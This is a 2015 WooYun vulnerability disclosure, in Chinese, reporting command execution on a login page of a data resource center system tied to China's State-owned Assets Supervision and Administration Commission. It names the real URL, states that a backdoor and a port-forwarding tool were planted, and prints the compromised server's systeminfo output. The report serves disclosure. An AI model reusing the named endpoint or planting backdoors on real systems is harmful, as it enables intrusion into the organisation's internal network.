国务院国有资产监督管理委员会直属单位数据资源中心系统沦陷（可导致内网漫游等危害）

发表于 2015年06月04日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0117673

漏洞标题：国务院国有资产监督管理委员会直属单位数据资源中心系统沦陷（可导致内网漫游等危害）

相关厂商：国务院国有资产监督管理委员会

漏洞作者：朱元璋

提交时间：2015-06-04 12:25

公开时间：2015-07-20 18:48

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：

漏洞详情

披露状态：

2015-06-04: 细节已通知厂商并且等待厂商处理中
2015-06-05: 厂商已经确认，细节仅向厂商公开
2015-06-15: 细节向核心白帽子及相关领域专家公开
2015-06-25: 细节向普通白帽子公开
2015-07-05: 细节向实习白帽子公开
2015-07-20: 细节向公众公开

简要描述：

传有后门，自己查杀，你们有瑞星杀毒，然而并没有什么卵用！一个端口转发都杀不了，还是换个杀毒软件吧?卡巴多好啊.呵呵

详细说明：

地址http://ads.catarc.info/DSS/login/login.action存在命令执行

传马看内网情况

systeminfo

主机名: WINDOWS-4RC8531<br>OS 名称: Microsoft Windows Server 2008 R2 Enterprise<br>OS 版本: 6.1.7601 Service Pack 1 Build 7601<br>OS 制造商: Microsoft Corporation<br>OS 配置: 独立服务器<br>OS 构件类型: Multiprocessor Free<br>注册的所有人: Windows 用户<br>
注册的组织:<br>产品 ID: 00486-001-0001076-84340<br>初始安装日期: 2015/1/20, 17:02:05<br>系统启动时间: 2015/3/30, 14:12:26<br>系统制造商: IBM<br>系统型号: System x3850 X5 -[71434AO]-<br>系统类型: x64-based PC<br>处理器: 安装了 4 个处理器。<br>
                  [01]: Intel64 Family 6 Model 47 Stepping 2 GenuineIntel ~1057 Mhz<br>
                  [02]: Intel64 Family 6 Model 47 Stepping 2 GenuineIntel ~1057 Mhz<br>
                  [03]: Intel64 Family 6 Model 47 Stepping 2 GenuineIntel ~1317 Mhz<br>
                  [04]: Intel64 Family 6 Model 47 Stepping 2 GenuineIntel ~1057 Mhz<br>BIOS 版本: IBM Corp. -[G0E183BUS-1.83]-, 2014/7/23<br>Windows 目录: C:\Windows<br>系统目录: C:\Windows\system32<br>启动设备: \Device\HarddiskVolume1<br>系统区域设置: zh-cn;中文(中国)<br>输入法区域设置: 暂缺<br>时区: (UTC+08:00)北京，重庆，香港特别行政区，乌鲁木齐<br>物理内存总量: 131,049 MB<br>可用的物理内存: 108,032 MB<br>
虚拟内存: 最大值: 262,096 MB<br>虚拟内存: 可用: 228,414 MB<br>
虚拟内存: 使用中: 33,682 MB<br>页面文件位置: C:\pagefile.sys<br>域: WORKGROUP<br>登录服务器: \\WINDOWS-4RC8531<br>修补程序: 安装了 2 个修补程序。<br>
                  [01]: KB958488<br>
                  [02]: KB976902<br>网卡: 安装了 3 个 NIC。<br>
                  [01]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client)<br>连接名: 本地连接 3<br>启用 DHCP: 否<br>
                      IP 地址<br>
                        [01]: **.**.**.**<br>
                        [02]: fe80::f836:c08d:14f7:228c<br>
                  [02]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client)<br>连接名: 本地连接 4<br>启用 DHCP: 是<br>
                      DHCP 服务器: **.**.**.**<br>
                      IP 地址<br>
                        [01]: **.**.**.**<br>
                        [02]: fe80::9d5f:450:6108:c7f3<br>
                  [03]: IBM USB Remote NDIS Network Device<br>连接名: 本地连接 5<br>
                      状态:        没有硬件

主机名: WINDOWS-4RC8531 OS 名称: Microsoft Windows Server 2008 R2 Enterprise OS 版本: 6.1.7601 Service Pack 1 Build 7601 OS 制造商: Microsoft Corporation OS 配置: 独立服务器 OS 构件类型: Multiprocessor Free 注册的所有人: Windows 用户

注册的组织: 产品 ID: 00486-001-0001076-84340 初始安装日期: 2015/1/20, 17:02:05 系统启动时间: 2015/3/30, 14:12:26 系统制造商: IBM 系统型号: System x3850 X5 -[71434AO]- 系统类型: x64-based PC 处理器: 安装了 4 个处理器。

[01]: Intel64 Family 6 Model 47 Stepping 2 GenuineIntel ~1057 Mhz

[02]: Intel64 Family 6 Model 47 Stepping 2 GenuineIntel ~1057 Mhz

[03]: Intel64 Family 6 Model 47 Stepping 2 GenuineIntel ~1317 Mhz

[04]: Intel64 Family 6 Model 47 Stepping 2 GenuineIntel ~1057 Mhz BIOS 版本: IBM Corp. -[G0E183BUS-1.83]-, 2014/7/23 Windows 目录: C:\Windows 系统目录: C:\Windows\system32 启动设备: \Device\HarddiskVolume1 系统区域设置: zh-cn;中文(中国) 输入法区域设置: 暂缺 时区: (UTC+08:00)北京，重庆，香港特别行政区，乌鲁木齐 物理内存总量: 131,049 MB 可用的物理内存: 108,032 MB